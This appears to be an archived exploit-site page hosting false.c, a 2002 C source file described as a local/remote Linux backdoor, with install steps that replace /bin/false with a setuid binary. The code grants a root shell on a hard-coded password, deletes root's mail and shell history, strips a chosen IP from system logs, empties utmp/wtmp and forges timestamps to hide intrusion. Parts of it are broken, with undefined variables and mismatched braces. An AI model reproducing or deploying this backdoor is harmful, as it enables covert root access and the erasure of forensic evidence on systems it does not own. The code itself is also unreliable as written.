false.c

false.c: Posted Jun 4, 2002; Authored by Pir8 | Site dtors.net; False.c is a local/remote backdoor for Linux.; tags | tool, remote, local, rootkit; systems | linux, unix; SHA-256 | 1258fc1afb8d05496afbb0ac6750abcae3d1f81d9148516aa2e5bdb83bce46ca; Download | Favorite | View

false.c

/* 
 * False.c - by Pir8
 *
 * False.c is a local/remote backdoor, depending
 * on how you set it up.
 *
 * Remote:
 * gcc false.c -o false -lcrypt
 * mv ./false /bin/false
 * passwd rpc or passwd xfs
 * chmod 4775 /bin/false
 *
 * Local:
 * gcc false.c -o sush -lcrypt
 * chmod 4775 sush
 * ./sush
 *
 */






#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define remove "/bin/rm"
#define link "/bin/ln"
#define grep "/bin/grep"
#define touch "/bin/touch"
#define killall "/usr/bin/killall"
#define echo "/bin/echo"
#define move "/bin/mv"
#define PWD "uXO1k5bPFzFhk" /* passwd can be changed using "htpasswd" */


int main() { /* Lets start the program */

  char *crypted=PWD;
  char *pass; /* variable for passwd */
  char ip[15];
  char execute[200];


  pass = (char *)getpass ("Password: "); /* lets get users pass */

  if (strcmp(crypt(pass,crypted),crypted)) { /* lets see if the pass entered matches */

    printf("SeCshell Protected.\n"); /* display text */
    sleep(3); /* rest for 3 secs */
    system("/bin/cat /dev/urandom"); /* Flood users Terminal */
    exit(1);
  }
  
  else 
  {
    setuid(0); /* remove this line if you dont want to get a root shell */
    setgid(0); /* remove this line if you dont want to get a root shell */
    
        
      while(i<argc){
  strcpy(argv[i],"xfs -daemon -cron"); 
} 
      
/* Lets start cleaning some files! */
      
  printf("Input an IP/Username to clean: ");
      scanf("%15s", ip);
      printf("Cleaning -> %s\n", ip);
      
  sprintf(execute,"%s /var/spool/mail/root", remove);
      system(execute);
      printf("\nCleaning mail.....");
  sprintf(execute,"%s \"\" > /var/spool/mail/root", echo);
  system(execute);
  printf("OK");
  
  sprintf(execute,"%s -r /bin/ls /var/spool/mail/root", touch);
  system(execute);
  
  printf("\nRemoving History.....");
  sprintf(execute,"%s -rf /root/.bash_history", remove);
  system(execute);
  printf("OK");
  
  printf("\nUpdating time stamps.....");
  sprintf(execute,"%s -s /dev/null /root/.bash_history", link);
  system(execute);
  printf("OK");
  
  printf("\nCleaning /var/log/secure.....");
  sprintf(execute,"%s -v %s /var/log/secure > /var/log/secure1", grep, ip);
  system(execute);
  sprintf(execute,"%s -f /var/log/secure1 /var/log/secure", move);
  system(execute);
  printf("OK");
  printf("\nUpdating time stamps.....");
  sprintf(execute,"%s -r /bin/ls /var/log/secure", touch);
  system(execute);
  printf("OK");

  printf("\nCleaning /var/log/lastlog.....");
  sprintf(execute,"%s -v %s /var/log/lastlog > /var/log/lastlog1", grep, ip);
  system(execute);
  sprintf(execute,"%s -f /var/log/lastlog1 /var/log/lastlog", move);
  system(execute);
  printf("OK");
  printf("\nUpdating time stamps.....");
  sprintf(execute,"%s -r /bin/ls /var/log/lastlog", touch);
  system(execute);
  printf("OK");

  printf("\nCleaning /var/log/xferlog.....");
  sprintf(execute,"%s -v %s /var/log/xferlog > /var/log/xferlog1", grep, ip);
  system(execute);
  sprintf(execute,"%s -f /var/log/xferlog1 /var/log/xferlog", move);
  system(execute);
  printf("OK");
  printf("\nUpdating time stamps.....");
  sprintf(execute,"%s -r /bin/ls /var/log/xferlog", touch);
  system(execute);
  printf("OK");

  
  printf("\nCleaning /var/log/messages.....");
  sprintf(execute,"%s -v %s /var/log/messages > /var/log/messages1", grep, ip);
  system(execute);
  sprintf(execute,"%s -f /var/log/messages1 /var/log/messages", move);
  system(execute);
      printf("OK");
  printf("\nUpdating time stamps.....");
  sprintf(execute,"%s -r /bin/ls /var/log/messages", touch);
  system(execute);
  printf("OK");
  
  printf("\nCleaning utmp and wtmp.....");
  sprintf(execute,"%s "" > /var/run/utmp", echo);
  system(execute);

  sprintf(execute,"%s "" > /var/run/wtmp", echo);
  system(execute);
  printf("OK");

  printf("\nRestarting syslogd.....");
  sprintf(execute,"%s -HUP syslogd", killall);
  system(execute);
  printf("\nCleaning restart log.....");
  sprintf(execute,"%s -v syslogd /var/log/messages > /var/log/messages1", grep);
  system(execute);
  sprintf(execute,"%s -f /var/log/messages1 /var/log/messages", move);
  system(execute);
  printf("OK");
  printf("\nUpdating time stamps.....");
  sprintf(execute,"%s -r /bin/ls /var/log/messages", touch);
  system(execute);
  printf("OK");
  printf("\n\nLogs have been cleaned successfully!");
  
              
  execl("/bin/sh",".dtors",0); /* Execute shell */

}
return (0);
}

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

false.c

false.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

false.c

Share This

false.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems